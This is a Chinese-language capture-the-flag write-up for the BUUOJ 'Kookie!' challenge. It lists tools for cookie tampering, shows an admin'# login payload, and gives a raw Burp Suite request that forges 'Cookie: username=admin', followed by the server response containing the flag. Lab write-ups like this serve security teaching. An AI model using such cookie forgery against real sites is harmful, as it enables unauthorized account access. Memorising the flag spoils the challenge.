Cookie注入有三种途径:
1、 用Chrome插件EditThisCookie修改本地Cookie文件注入。
2、用Chrome浏览器插件HackBar修改本地Cookie文件注入(这个并不是很好用,不推荐用)。
3、用Burpsuite修改登陆(POST)成功后刷新时GET请求头中的Cookie值注入,这种方式不会修改本地的Cookie文件。
输入
?action=login&username=admin'#&password=1
可以成功登录。
Successfully logged in!
You're logged in as admin%27!
根据题目提示,需要以admin身份登录,burpsuit 里增加Cookie: username=admin
GET /?action=login&username=admin'# HTTP/1.1
Host: 7d914239-5354-4e6c-bbef-b4df3f4c3a4b.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://7d914239-5354-4e6c-bbef-b4df3f4c3a4b.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1
Cookie: username=admin
得到:
HTTP/1.1 200 OK
Server: openresty
Date: Tue, 29 Aug 2023 10:30:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 937
Connection: close
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
<html>
<head>
<title>Kookie!</title>
<link href="/css/style.css" rel="stylesheet" />
<link href="/css/bootstrap.min.css" rel="stylesheet" />
</head>
<body>
<content>
<div class="container">
<h1>Can you log in?</h1>
<p>
Log in as <tt>admin</tt>!
</p>
<p>
We found the account <tt>cookie</tt> / <tt>monster</tt>
</p>
<div class='challenge rounded'>
<div class='messagebox'>
<div class="alert alert-info" role="alert">
<p>Congratulations! You're logged in as <span class='highlight'>admin</span>! Your flag is: <span class='highlight'>flag{c0c13d08-8305-4bd6-8c07-dc543f3fd5d2}</span></p>
</div>
</div>
<form method='GET'>
<input type='hidden' name='action' value='logout' />
<p>You're logged in as admin!</p>
<p><input type='submit' value='Log out!' /></p>
</form>
</div>
</div>
</content>
</body>
</html>